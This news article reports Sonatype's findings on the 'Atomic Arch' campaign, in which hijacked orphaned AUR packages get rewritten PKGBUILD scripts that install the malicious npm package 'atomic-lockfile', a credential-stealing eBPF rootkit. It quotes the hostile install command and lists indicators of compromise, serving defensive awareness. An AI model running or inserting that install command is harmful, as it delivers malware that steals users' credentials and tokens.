Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Atomic Arch campaign hijacks 20+ Linux AUR packages to deliver malware via ownership transfers.
Summary
The Atomic Arch campaign is exploiting the Arch User Repository (AUR) ownership transfer process to distribute malware. Threat actors are taking over abandoned packages, rewriting build instructions to include malicious dependencies like 'atomic-lockfile', which then deploys a rootkit-like payload using eBPF. This payload hides its presence and steals sensitive data including credentials, GitHub keys, and tokens.
Full text
Security Cyber Attacks MalwareAtomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware Over 20 Linux packages were compromised in the Atomic Arch campaign, which abuses AUR ownership transfers to drop rootkit-like malware. byDeeba AhmedJune 12, 20262 minute read Research firm Sonatype has discovered a malicious campaign targeting Linux systems in an entirely different way. Hackers are exploiting a vulnerability in the open-source ownership transfer process to deliver malware. The campaign is dubbed “Atomic Arch” as it targets the Arch User Repository (AUR), an online platform where community members maintain installation files for different software packages. When a developer walks away from a project, it becomes an orphaned package. This means another user can request ownership and take over legitimate abandoned projects. And, because the package keeps its original name and trusted history, unsuspecting users end up downloading malicious updates without suspecting any danger. According to researchers, more than 20 AUR packages have already been compromised. Sonatype has shared the technical details of this ongoing software supply chain attack with Hackread.com. Inside the Attack Chain Sonatype engineer Eyad Hasan first flagged the issue, and subsequent investigation revealed that the threat actors don’t actually alter the original application source code. They rewrite the build instructions inside a configuration file called the PKGBUILD. When a user installs or updates the software, a modified post-install script automatically runs the command npm install atomic-lockfile minimist chalk. This forces the computer to get a malicious dependency called atomic-lockfile, the primary malware package used in this attack, from the public npm registry. Researchers noted that the hijacked package itself looks perfectly clean. That’s why standard signature-based security tools fail to successfully flag the threat. Sonatype Research Labs is tracking this specific atomic-lockfile dependency under the reference Sonatype-2026-003775, giving the threat a high-severity CVSS score of 8.7. Advanced Stealth Techniques Sonatype researcher Adam Reynolds analysed the atomic-lockfile package and found a bundled native Linux binary executable. Triggered during a preinstall script phase inside the package.json file, this binary deploys a second-stage payload using a Linux kernel technology called eBPF. Further probing revealed that the malware loads a specific code file named scales.bpf.c to gain rootkit-like powers. By messing with the system calls that list directory contents, it completely hides its files and processes from the user. It even tracks active systems to spot code debuggers and stop security tools from analysing it. The payload then focuses on stealing credentials. It looks for GitHub keys, SSH data, HashiCorp Vault tokens, browser cookies, and saved data from a wide range of communication tools such as Slack, Discord, Microsoft Teams, and Telegram. The stolen data is then directly sent to the attacker using built-in web upload tools. While these methods look a lot like an older campaign called IronWorm, Sonatype has not officially linked Atomic Arch to a specific hacker group yet. Experts warn that simply deleting the main package will not clean a computer if this deep system payload has already started running. Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts Atomic ArchCyber AttackCybersecurityLinuxMalwareSonatypeSupply Chain AttackVulnerability Leave a Reply Cancel reply View Comments (0) Related Posts Science Security Man To Serve 8 Years in Prison For Planning to Kill Muslims With X-ray Gun A 57-year-old man (Eric Feight) from New York has been sentenced for eight years on the charges of… byAgan Uzunovic Security Private and order details of nearly 100k Razer customers leaked online A misconfigured Elasticsearch server is responsible for exposing the personal details of a large number of Razer customers. byWaqas Security New AI tool aims to make CAPTCHA a thing of the past Text-based options for verification purposes on websites and other digital forums are going to be a thing of… byWaqas Read More Security Insider Threat Awareness Month: Protecting Your Business from Within This article delves into the significance of Insider Threat Awareness Month and explores effective strategies that organizations can employ to detect and mitigate these often elusive threats. byWaqas
Indicators of Compromise
- malware — atomic-lockfile
- url — https://www.npmjs.com/package/atomic-lockfile
- mitre_attack — T1070.004
- mitre_attack — T1555